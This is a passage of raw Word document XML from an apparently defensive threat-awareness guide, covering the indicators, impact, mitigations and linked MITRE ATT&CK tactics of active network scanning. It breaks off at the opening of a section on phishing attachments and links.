      </w:r>
    </w:p>
    <w:p w14:paraId="1BC21FFE" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Unusual amounts of failed connection attempts in firewall logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01521B82" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Multiple sequential pings in a short time from one IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F60199" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Massive Nmap or scanner requests in security monitoring tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A82D58" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Motivation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E030FC" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Attackers want to map your network quietly to plan targeted attacks later (often for data theft or ransomware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA5BCE2" w14:textId="76D3F96D" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Impact (If Not Caught):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C0391" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Gives attackers a detailed map—making targeted, damaging attacks far easier and faster later on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F77BA9" w14:textId="19F76CD8" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact of Active Scanning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2"/>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="5666ACD3" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2507" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="794FE6B8" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impact Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0953295E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="5D541FDB" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2507" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C0104E7" w14:textId="50E1A2E0" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Information Leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E25DB20" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00501A9C">
            <w:pPr>
              <w:ind w:right="-1142"/>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Reveals internal IPs, services, device types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="38EA1250" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2507" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F570E77" w14:textId="50BEB5DC" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Attack Planning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49D2D960" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Helps attacker choose best method of entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="18CE0DCD" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2507" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CD6A1F" w14:textId="07B2EC2A" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>System Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4633" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="116CDFB0" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Scans may hit forgotten or outdated systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37A4D6AD" w14:textId="6D1C8498" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation for Active Scanning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10"/>
        <w:gridCol w:w="5954"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4CB87EE5" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49CC745A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5909" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="439881CD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How It Helps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="19AF1257" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE906D5" w14:textId="782B1642" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Firewalls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5909" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72B80BF1" w14:textId="51E67FF5" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Block unnecessary inbound and outbound traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="19B30756" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5F5BC2" w14:textId="6B20D286" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Intrusion Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5909" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21501E9C" w14:textId="474AF862" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Alert on scanning patterns like mass pings or port scans</w:t>
            </w:r>
            <w:r w:rsidR="00041292">
              <w:t xml:space="preserve"> and also </w:t>
            </w:r>
            <w:r w:rsidR="00041292" w:rsidRPr="00E817BE">
              <w:t>Prevention Systems to detect/stop scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="63E2F207" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="042D3EB8" w14:textId="6455FD4B" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5909" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56CBCF77" w14:textId="4F1216EE" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Isolate internal systems so one scan can’t reach everything</w:t>
            </w:r>
            <w:r w:rsidR="00041292">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00041292" w:rsidRPr="00E817BE">
              <w:t>never allow direct access to sensitive ports/services from the internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="758E7123" w14:textId="77777777" w:rsidTr="00501A9C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2365" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="146BE2AB" w14:textId="535DFF5E" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Rate-Limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5909" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09E371B9" w14:textId="3948BF27" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Slow down or block suspicious activity from unknown I</w:t>
            </w:r>
            <w:r w:rsidR="00041292" w:rsidRPr="00D60AEC">
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="00041292">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00041292" w:rsidRPr="00E817BE">
              <w:t>and monitor for bursts of scan-like activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D15BFEF" w14:textId="77777777" w:rsidR="00041292" w:rsidRDefault="00041292" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166BC65F" w14:textId="77777777" w:rsidR="00041292" w:rsidRDefault="00041292" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA64909" w14:textId="77777777" w:rsidR="00041292" w:rsidRDefault="00041292" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDDF4BB" w14:textId="77777777" w:rsidR="00041292" w:rsidRDefault="00041292" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBE22BD" w14:textId="154CBC3C" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linked MITRE ATT&amp;CK Tactics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6"/>
        <w:gridCol w:w="2322"/>
        <w:gridCol w:w="3265"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="37DE22C4" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78479CF9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E5E0772" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28509E85" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How This Technique Supports It</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4ACA3544" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE899DC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0043</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="796372E5" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="773BC38F" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Gathers early info about targets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="77C36A96" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A6A5655" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C7ED28B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58600C44" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Reveals active hosts and services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="09EA611C" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EDCED30" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0042</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C84051C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Resource Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FC4BF45" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Helps attacker build a target list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F6BADA0" w14:textId="6C19E157" w:rsidR="00041292" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technique 2: Phishing (T1566.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8463A3" w14:textId="3F7B852C" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technique: Phishing: Attachment or Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEF5BF3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> T1566.001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A75D28" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Associated Tactics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ADA63E" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CF62C8" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D465C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850F7A3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25252888" w14:textId="18A1E527" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is Phishing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28664767" w14:textId="59062F81" w:rsidR="00041292" w:rsidRPr="00E817BE" w:rsidRDefault="00D60AEC" w:rsidP="00041292">
      <w:r w:rsidRPr="00D60AEC">
